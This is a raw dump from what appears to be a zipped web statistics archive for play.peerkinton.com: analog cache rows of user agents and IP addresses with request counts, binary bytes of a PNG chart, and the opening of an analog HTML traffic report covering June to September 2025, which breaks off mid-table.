x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 8 8 0 5 29371111 0 29227078 29177761 0 29177952 4994 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 1 1 0 0 29352344 0 0 29352344 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15 4 4 0 0 0 29352662 0 0 29177004 0 0 256 Cpanel-HTTP-Client/1.0 4 1 1 0 1 29267968 0 29391439 29267968 0 29391439 612 Mozilla/5.0 4 9 3 0 0 29355880 0 0 29177007 0 0 9287 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 4 1 1 0 0 29381839 0 0 29381839 0 0 314 Mozilla/5.0 (Linux; Android 13; CPH2065; Build/TQ2A.251004.104) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.82 Mobile Safari/537.36 5 0 0 0 1 0 0 29391439 0 0 29391439 0 45.148.10.157 5 0 0 0 1 0 0 29178520 0 0 29178520 0 91.196.152.80 5 3 3 0 33 29369319 0 29369319 29369318 0 29369319 3432 178.128.207.138 5 3 3 0 1 29328433 0 29328470 29328413 0 29328470 2046 183.134.59.131 5 2 2 1 0 29381892 29381892 0 29381892 29381892 0 628 199.45.155.96 5 4 4 0 0 29357346 0 0 29357346 0 0 5500 2.57.122.173 5 0 0 0 1 0 0 29321909 0 0 29321909 0 101.198.0.189 5 2 2 0 2 29352663 0 29352663 29264826 0 29264826 1294 51.89.167.1 5 0 0 0 1 0 0 29321909 0 0 29321909 0 101.198.0.188 5 1 1 0 0 29226403 0 0 29226403 0 0 1266 198.235.24.128 5 1 1 0 1 29200756 0 29200756 29200756 0 29200756 616 139.59.62.197 5 7 1 0 0 29360912 0 0 29177006 0 0 9647 34.72.176.129 5 0 0 0 1 0 0 29321909 0 0 29321909 0 101.198.0.182 5 2 2 0 1 29268563 0 29268563 29268563 0 29268563 1224 199.45.155.88 5 1 1 0 1 29370709 0 29370709 29370709 0 29370709 682 68.183.14.59 5 1 1 0 1 29321909 0 29321909 29321909 0 29321909 682 101.198.0.180 5 1 1 0 0 29398729 0 0 29398729 0 0 314 35.170.13.97 5 1 1 0 0 29266101 0 0 29266101 0 0 612 34.105.69.79 5 1 1 0 0 29265690 0 0 29265690 0 0 612 35.196.62.137 5 1 1 0 1 29327738 0 29327738 29327738 0 29327738 682 209.38.236.107 5 2 2 0 1 29225612 0 29225612 29225612 0 29225612 1232 72.167.133.2 5 4 0 0 0 29360912 0 0 29177006 0 0 1612 34.122.147.229 5 2 2 1 2 29411484 29411484 29411484 29411484 29411484 29411484 628 199.45.155.75 5 1 1 0 0 29267968 0 0 29267968 0 0 612 172.245.241.123 5 1 1 0 0 29182800 0 0 29182800 0 0 616 34.9.164.177 5 1 0 0 0 29352663 0 0 29352663 0 0 87 44.249.55.71 5 1 0 0 0 29352663 0 0 29352663 0 0 87 23.178.112.213 5 1 1 0 0 29178511 0 0 29178511 0 0 1266 91.231.89.123 5 1 1 0 1 29269888 0 29269888 29269888 0 29269888 612 147.182.150.252 5 1 1 0 0 29290984 0 0 29290984 0 0 612 87.236.176.14 5 4 2 0 6 29339349 0 29339349 29339349 0 29339349 4047 95.173.216.42 5 8 2 0 0 29177007 0 0 29177007 0 0 8064 205.169.39.131 5 1 1 0 0 29206196 0 0 29206196 0 0 616 68.183.43.24 5 1 1 0 0 29352756 0 0 29352756 0 0 1375 91.231.89.39 5 1 1 0 0 29321909 0 0 29321909 0 0 682 101.198.0.152 5 0 0 0 189 0 0 29389040 0 0 29389039 0 52.167.161.194 5 1 1 0 1 29307613 0 29307613 29307613 0 29307613 682 209.38.66.9 5 1 1 0 0 29268574 0 0 29268574 0 0 612 34.145.196.198 5 1 1 0 0 29321909 0 0 29321909 0 0 1375 101.198.0.150 5 8 2 0 0 29355880 0 0 29355880 0 0 8212 205.169.39.124 5 0 0 0 2 0 0 29181236 0 0 29181236 0 157.20.32.141 5 1 1 0 0 29231401 0 0 29231401 0 0 1266 205.210.31.209 5 1 1 0 0 29371292 0 0 29371292 0 0 682 34.82.193.167 5 1 1 0 0 29361129 0 0 29361129 0 0 1375 198.235.24.90 5 1 1 0 1 29356350 0 29356350 29356350 0 29356350 682 164.90.207.49 5 3 1 0 10 29243780 0 29243780 29243780 0 29243780 3299 185.177.72.38 5 5 1 0 0 29352710 0 0 29352710 0 0 5071 205.169.39.58 5 1 1 0 1 29407908 0 29407908 29407908 0 29407908 314 146.190.227.61 5 6 2 0 0 29383066 0 0 29207111 0 0 5303 205.169.39.57 5 1 1 0 0 29266097 0 0 29266097 0 0 612 35.230.93.239 5 1 1 0 0 29354085 0 0 29354085 0 0 682 34.73.122.252 5 3 3 0 0 29321918 0 0 29217705 0 0 2673 27.115.124.96 5 1 1 0 1 29177952 0 29177952 29177952 0 29177952 616 24.199.121.72 5 8 2 0 0 29264861 0 0 29264861 0 0 8072 205.169.39.110 5 1 1 0 0 29353917 0 0 29353917 0 0 682 34.74.207.37 5 1 1 0 0 29367139 0 0 29367139 0 0 1375 205.210.31.183 5 1 1 0 0 29387119 0 0 29387119 0 0 314 34.72.208.193 5 1 1 0 1 29227078 0 29227078 29227078 0 29227078 616 165.227.177.242 5 1 1 0 0 29264842 0 0 29264842 0 0 612 205.169.39.46 5 1 1 0 0 29355181 0 0 29355181 0 0 682 34.125.35.219 5 1 1 0 1 29177006 0 29177006 29177006 0 29177006 616 57.129.16.41 5 1 1 0 3 29379413 0 29379413 29379413 0 29379413 682 47.84.11.89 5 1 0 0 0 29177005 0 0 29177005 0 0 87 44.246.126.131 5 1 0 0 0 29264824 0 0 29264824 0 0 87 16.170.15.203 5 1 1 0 1 29267000 0 29267000 29267000 0 29267000 612 68.183.33.100 5 1 1 0 1 29286850 0 29192143 29286850 0 29192143 1267 205.210.31.161 5 0 0 0 1 0 0 29217705 0 0 29217705 0 27.115.124.68 5 1 0 0 0 29352711 0 0 29352711 0 0 2321 205.169.39.27 5 1 0 0 0 29352663 0 0 29352663 0 0 87 3.147.126.48 5 2 1 0 0 29369334 0 0 29352711 0 0 1966 205.169.39.26 5 5 1 0 0 29264842 0 0 29264842 0 0 5001 205.169.39.22 5 1 1 0 0 29186926 0 0 29186926 0 0 1266 198.235.24.48 5 4 0 0 0 29352662 0 0 29177004 0 0 256 194.87.217.15 5 1 1 0 0 29352665 0 0 29352665 0 0 682 205.169.39.15 5 5 1 0 0 29360929 0 0 29360929 0 0 5071 205.169.39.14 5 5 1 0 0 29177006 0 0 29177006 0 0 4989 205.169.39.13 5 0 0 0 2 0 0 29373398 0 0 29373398 0 157.15.40.60 5 1 1 0 0 29211520 0 0 29211520 0 0 616 34.12.97.128 5 1 0 0 0 29264842 0 0 29264842 0 0 362 205.169.39.11 5 0 0 0 3 0 0 29321918 0 0 29217705 0 27.115.124.49 5 1 1 0 1 29246514 0 29246514 29246514 0 29246514 616 134.209.236.6 5 0 0 0 2 0 0 29228774 0 0 29228774 0 123.6.49.9 5 1 1 0 1 29186497 0 29186497 29186497 0 29186497 616 142.93.150.95 5 0 0 0 1 0 0 29210542 0 0 29210542 0 123.6.49.6 5 10 2 0 0 29177102 0 0 29177102 0 0 9974 35.88.224.238 5 0 0 0 2 0 0 29248155 0 0 29248155 0 123.6.49.4 5 0 0 0 1 0 0 29321918 0 0 29321918 0 27.115.124.41 5 1 0 0 0 29264842 0 0 29264842 0 0 362 104.197.69.115 5 0 0 0 1 0 0 29352122 0 0 29352122 0 172.182.207.3 5 1 1 0 0 29353841 0 0 29353841 0 0 682 34.6.232.101 5 1 0 0 0 29264824 0 0 29264824 0 0 87 18.218.182.34 5 1 1 0 1 29321918 0 29217705 29321918 0 29217705 682 27.115.124.34 5 1 1 0 0 29389711 0 0 29389711 0 0 314 35.204.54.132 5 1 1 0 0 29335323 0 0 29335323 0 0 1375 34.241.142.194 5 2 0 0 0 29264824 0 0 29177005 0 0 174 23.178.112.108 5 1 1 0 1 29197988 0 29197988 29197988 0 29197988 616 128.199.20.9 5 1 0 0 0 29177005 0 0 29177005 0 0 87 16.170.210.76 5 0 0 0 2 0 0 29248155 0 0 29228774 0 123.6.49.49 5 1 1 0 0 29186543 0 0 29186543 0 0 1262 198.235.24.13 5 1 1 0 0 29389990 0 0 29389990 0 0 314 35.205.247.9 5 1 1 0 1 29217705 0 29321918 29217705 0 29321918 616 27.115.124.114 5 1 1 0 0 29335984 0 0 29335984 0 0 682 185.247.137.68 5 1 0 0 0 29352711 0 0 29352711 0 0 422 205.169.39.8 5 1 1 0 1 29217705 0 29217705 29217705 0 29217705 1266 27.115.124.112 5 1 1 0 2 29248155 0 29210542 29248155 0 29210541 616 123.6.49.46 5 1 1 0 1 29287509 0 29287509 29287509 0 29287509 612 143.110.223.200 5 6 6 0 51 29352663 0 29352663 29264825 0 29264825 6578 157.230.19.140 5 1 1 0 0 29236490 0 0 29236490 0 0 616 185.247.137.65 5 1 1 0 0 29366618 0 0 29366618 0 0 1375 205.210.31.109 5 2 2 1 2 29408738 29408738 29408738 29408738 29408738 29408738 628 66.132.153.129 5 1 1 0 2 29210542 0 29228774 29210542 0 29210542 616 123.6.49.42 5 1 1 0 1 29228774 0 29210541 29228774 0 29210541 616 123.6.49.41 5 1 1 0 0 29177053 0 0 29177053 0 0 1266 192.175.111.253 5 0 0 0 4 0 0 29286691 0 0 29269191 0 92.223.85.60 5 0 0 0 1 0 0 29210542 0 0 29210542 0 123.6.49.38 5 0 0 0 2 0 0 29217705 0 0 29217705 0 27.115.124.104 5 0 0 0 2 0 0 29337978 0 0 29337970 0 18.156.20.121 5 5 1 0 0 29295422 0 0 29295422 0 0 5071 205.169.39.0 5 0 0 0 1 0 0 29406164 0 0 29406164 0 74.7.241.171 5 1 1 0 0 29228774 0 0 29228774 0 0 616 123.6.49.36 5 2 2 0 1 29353721 0 29353721 29353721 0 29353721 1364 66.132.153.123 5 0 0 0 1 0 0 29177053 0 0 29177053 0 192.175.111.244 5 0 0 0 1 0 0 29369511 0 0 29369511 0 147.185.132.219 5 1 1 0 1 29183556 0 29183556 29183556 0 29183556 616 138.68.137.219 5 1 1 0 1 29367625 0 29367625 29367625 0 29367625 682 159.89.175.201 5 2 2 0 1 29297581 0 29297581 29297580 0 29297581 1364 66.132.153.113 5 1 1 0 1 29244899 0 29244899 29244899 0 29244899 616 185.177.72.108 5 3 3 0 18 29177006 0 29177006 29177006 0 29177006 3148 64.227.32.66 5 1 0 0 0 29352663 0 0 29352663 0 0 87 13.48.124.191 5 3 3 0 2 29228774 0 29228774 29210541 0 29228774 3148 123.6.49.17 5 1 1 0 1 29272498 0 29272498 29272498 0 29272498 612 34.124.247.247 5 1 1 0 0 29177053 0 0 29177053 0 0 1266 192.175.111.228 5 3 1 0 0 29316982 0 0 29316982 0 0 9763 93.123.109.245 5 1 1 0 1 29388214 0 29388214 29388214 0 29388214 314 134.209.175.115 5 2 2 0 1 29212292 0 29212292 29212292 0 29212292 1232 167.94.138.205 5 2 2 0 1 29178675 0 29178675 29178675 0 29178675 1232 167.94.146.53 5 2 2 0 1 29225441 0 29225440 29225440 0 29225440 1232 167.94.138.195 5 1 1 0 3 29248155 0 29248155 29248155 0 29248155 616 123.6.49.14 5 1 1 0 0 29248155 0 0 29248155 0 0 1266 123.6.49.10 5 1 1 0 0 29205442 0 0 29205442 0 0 616 52.88.228.176 5 1 0 0 0 29264824 0 0 29264824 0 0 87 13.215.174.243 5 1 0 0 0 29177005 0 0 29177005 0 0 87 3.0.18.166 5 1 1 0 0 29370898 0 0 29370898 0 0 682 136.118.41.77 5 1 1 0 1 29353353 0 29353353 29353353 0 29353353 682 161.35.25.51 5 1 1 0 1 29347494 0 29347494 29347494 0 29347494 682 139.59.94.252 5 0 0 0 136 0 0 29402978 0 0 29402977 0 172.207.189.235 5 1 1 0 0 29277271 0 0 29277271 0 0 1267 205.210.31.34 5 2 2 0 1 29225478 0 29225477 29225477 0 29225477 1232 167.94.138.176 5 4 1 0 2 29354365 0 29354365 29354365 0 29354365 4311 34.1.21.180 5 0 0 0 137 0 0 29369009 0 0 29369009 0 4.241.111.42 5 1 1 0 1 29275587 0 29275587 29275587 0 29275587 612 34.124.238.233 5 8 3 0 0 29360912 0 0 29177006 0 0 8511 34.123.170.104 5 1 1 0 1 29373536 0 29373536 29373536 0 29373536 682 165.232.112.136 5 1 1 0 0 29281012 0 0 29281012 0 0 1267 147.185.132.171 5 1 1 0 0 29371597 0 0 29371597 0 0 1375 34.241.8.45 5 10 2 0 0 29177102 0 0 29177102 0 0 9978 54.213.164.107 5 2 2 0 1 29250832 0 29250831 29250831 0 29250831 1372 167.94.138.163 5 0 0 0 1 0 0 29204987 0 0 29204987 0 216.81.248.170 5 1 1 0 0 29307790 0 0 29307790 0 0 1375 205.210.31.20 5 2 2 0 1 29250837 0 29250836 29250836 0 29250836 1372 206.168.34.117 5 1 0 0 0 29352663 0 0 29352663 0 0 87 18.143.160.211 5 1 1 0 0 29320206 0 0 29320206 0 0 682 103.173.66.134 5 0 0 0 10 0 0 29372450 0 0 29309134 0 45.148.10.246 5 1 1 0 0 29265925 0 0 29265925 0 0 612 34.21.81.217 5 0 0 0 1 0 0 29184554 0 0 29184554 0 198.235.24.217 5 2 2 0 1 29225546 0 29225546 29225546 0 29225546 1232 206.168.34.77 5 1 1 0 0 29390663 0 0 29390663 0 0 314 185.247.137.156 5 0 0 0 2 0 0 29287993 0 0 29287993 0 185.54.231.44 5 1 1 0 0 29355226 0 0 29355226 0 0 682 34.187.144.57 5 4 1 0 2 29353683 0 29353683 29353683 0 29353683 4311 34.1.21.144 5 1 1 0 1 29266758 0 29266758 29266758 0 29266758 612 142.93.144.249 5 1 1 0 0 29177053 0 0 29177053 0 0 1266 64.15.129.123 5 2 2 0 1 29211885 0 29211885 29211885 0 29211885 1232 206.168.34.66 5 1 1 0 0 29351663 0 0 29351663 0 0 1375 147.185.132.135 5 1 1 0 0 29371305 0 0 29371305 0 0 682 35.227.136.73 5 1 1 0 0 29352344 0 0 29352344 0 0 682 162.215.9.119 5 0 0 0 1 0 0 29253995 0 0 29253995 0 195.178.110.75 5 1 0 0 0 29177005 0 0 29177005 0 0 87 18.191.80.140 5 2 2 0 1 29282132 0 29282132 29282132 0 29282132 1224 162.142.125.197 5 2 2 0 1 29309075 0 29309075 29309075 0 29309075 1364 206.168.34.53 5 1 1 0 0 29275528 0 0 29275528 0 0 1267 147.185.132.123 5 1 1 0 0 29177053 0 0 29177053 0 0 1266 64.15.129.108 5 1 1 0 0 29389750 0 0 29389750 0 0 314 35.195.37.75 5 1 1 0 1 29180738 0 29180738 29180738 0 29180738 616 157.230.123.202 5 2 2 0 0 29177102 0 0 29177102 0 0 1228 44.249.37.15 5 2 2 0 1 29181300 0 29181300 29181300 0 29181300 1232 206.168.34.44 5 0 0 0 127 0 0 29390242 0 0 29390242 0 40.113.19.56 5 1 1 0 0 29177045 0 0 29177045 0 0 616 34.41.180.249 5 0 0 0 151 0 0 29377201 0 0 29377200 0 20.78.73.233 5 1 1 0 1 29371111 0 29371111 29371111 0 29371111 682 195.181.161.9 5 0 0 0 2 0 0 29269131 0 0 29269131 0 185.54.231.10 5 0 0 0 1 0 0 29288754 0 0 29288754 0 198.235.24.164 5 1 1 0 0 29208557 0 0 29208557 0 0 616 34.150.153.132 5 0 0 0 1 0 0 29278173 0 0 29278173 0 147.185.132.100 5 1 1 0 0 29268696 0 0 29268696 0 0 612 35.230.1.45 5 1 1 0 0 29179866 0 0 29179866 0 0 616 34.145.235.40 5 12 10 0 108 29354574 0 29354575 29354570 0 29354570 22141 3.15.24.151 5 1 1 0 1 29177761 0 29177761 29177761 0 29177761 616 85.190.239.97 5 1 0 0 0 29264824 0 0 29264824 0 0 87 34.212.244.67 5 1 1 0 0 29178154 0 0 29178154 0 0 616 87.236.176.146 5 1 1 0 0 29352675 0 0 29352675 0 0 1375 91.231.89.97 5 1 1 0 0 29197714 0 0 29197714 0 0 1266 198.235.24.148 5 3 3 0 1 29381839 0 29381839 29381839 0 29381839 942 152.32.192.212 5 1 1 0 0 29369723 0 0 29369723 0 0 682 34.23.9.35 5 2 2 0 0 29177102 0 0 29177102 0 0 1232 34.222.118.190 5 4 1 0 2 29353781 0 29353781 29353781 0 29353781 4311 34.1.24.117 5 1 1 0 0 29280752 0 0 29280752 0 0 1267 3.249.222.231 5 1 1 0 0 29386919 0 0 29386919 0 0 314 35.243.155.11 z 2 19 0 29352663 1561 z 3 205 159 29411484 113814 z 4 102 53 29371597 171650 c 200 326 29411484 c 301 3 29411484 c 403 37 29373398 c 404 1057 29411484 PK HG�[��3�w w refsite.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx��m��8E�������zC����ʀI�+ac�� ��4`t���V[��&B���էP����P _�ꛥ%䣗�m���AV�� MYr(�� (�� (�� (�� (�� (�� (�� (�� ( _�>�\ޞY�q2��3{C�es���S}�e�31�꺶��J��W�ֲ���Y�����WWͶpY���FV�YDei���5d��{)��M�����(b���j+��]�z]�=�@di�+���ʾ��e0(��1�rY��eD�,#�*L�T��5Ñ��^AHe]EdU��G(+��Dm�n�O�@^�LV�a�eI��"kw�~���� Ωq��p�:�%h[���,�GVh���$�e�\�e�����95��1���:�� $�" �H�q�Z�2�L�6NV��q��V��w�]�=$���ml�ǟ��$�t�!�m-�쐇q5���ݚe��������؍�#�k� ��' �u��cxܶ�1\ɚR�L�I�6�,c��D��ɑ�l����uDzL�'� ���a�z.����������:�Fְ��i�0�jԴ�w��NI�$�ݝ�9£�Ⱥ ���֡�xd q���vq{CO˴^+g��*�5~���s�W/�+��d��/�6k���î���ZG�L�/�� ���b��6{��o$�Dz���9�u��#KV-�5qYzn��$�*�5�˺��͓UIiIe�s�)�����l���j���� �p��ϺvkML�~n����A�>��9�51Y��h3e����s���!���9<O�o>��9,�,�8�Pi e���"+4�u��P�m3�@i e�JkC���sX2Yz;�LY��ɺp+QV �����g]>�%��Ma����9|���Ϻ|K$kWX�����"kf=�u��D���2eyh|����Z��Oa����M�d� ˟C���'j Y�Ң,o ��%�U|����+����d�rHY�zK�Uz��B��+-DV�EY ~Y��r��*<���}iQVx�����-+WV�M�++RX�B��.-\ֶ�~��X �]ia���a������(ˏOV�eu�b��nZ)�Z�ZV��!��R@����&�ZV�XZ����V�����b/�eu9Deܴe��e��[�*��R@����d��Ң�cZ�^�d�{9L�5琲$c�,����~�,a��҂e���) C��!e�h)���˒_�e{9̒�R����aSeȓ5䐲��,�;eQ��\Y-e�)9eQ��lY�9ޤVY��:�G�s4���SMeQV��, ��, ��, ��, ��, ��,��E�H�34��@Y �@Y �>�b/���@Y ��.�b[e!P eP@�`dP�Ő��>�'�rSHY���1v9ܲ(�� ( �p�(���|u%e!P e��a�G��*�<�.,�B���)��SHY��~�ae�,�kF3)��(���< O!��ۙ^X������� �g�V�EYAY���e�_Z�e!�e����S�uvi�_X���un+HaLֹ�UAaEe�YZ5��d���)�d)��BTQXqY�u�:֑���XGaQB\�Y9�#�G��)�*.��P�)�JBx,� VB��� VSX��UK����Z��@Vnת�c�d����de���de��(�BY:�VU�d���VM KIe%�����Jj[u5,%��Ҷjs%���<�?�#�����Bd)%�TBH��2�0Y@+̠eI��֘A�����S,K��(�*�� *�0�m��RdţX�[�5 ��(��h*��Y=^]5'В(k�u�UU5�,˦q�6�Q{U dȚ�pڹ�=��~�@Y �@Y �@Y �@Y �@Y ���NVcvo��� z��~��]�S��b����6v��/;4YM����d�\��>v�s���0��V��/+�_c��]?:��uc����m��6������ ��~ �@�f�Xo�~5c=�8l۬�fo�Gk�-G���_�_�7�� l�hm��vk�^n� n����.6�棩���2���>V��z\L@�xs�\_j�"��e���V�̸�r����fY��jԻ���,;�)2jz��"˵�Iְ��Qc�<���1�m�5>��Xc~�)�~Y��6s�֫o5�+�r�]V ޕ�m�˅vM�L���i]��|�/�O��7����������@+����{C ��, ��, ��, ��, ��, ��, ��,�Q�!"Y_�D�G/���(�����%�C�����[{gT�z IEND�B`�PK HG�[V8�� �� 9.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Tue, Sep 30 2025 at 12:11 PM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Tue, Sep 30 2025 at 10:38 AM (100.63 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Sep 30 2025 at 12:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 196 (10) <br /><span class="gensumtitle">Average successful requests per day:</span> 1 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 126 (8) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (1) <br /><span class="gensumtitle">Failed requests:</span> 130 (8) <br /><span class="gensumtitle">Distinct files requested:</span> 17 (61) <br /><span class="gensumtitle">Distinct hosts served:</span> 111 (131) <br /><span class="gensumtitle">Data transferred:</span> 162.55 kilobytes (15.55 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.62 kilobytes (2.22 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">36</td><td class="P">32</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">59</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">28</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2025 (36 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">24</td><td class="P">24</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">22</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">35</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">20</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">Sat</td><td class="R">84</td><td class="P">41</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">6</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 1</td><td class="R">14</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 4</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 5</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 6</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 7</td><td class="R">5</td><td class="P">5</td><td 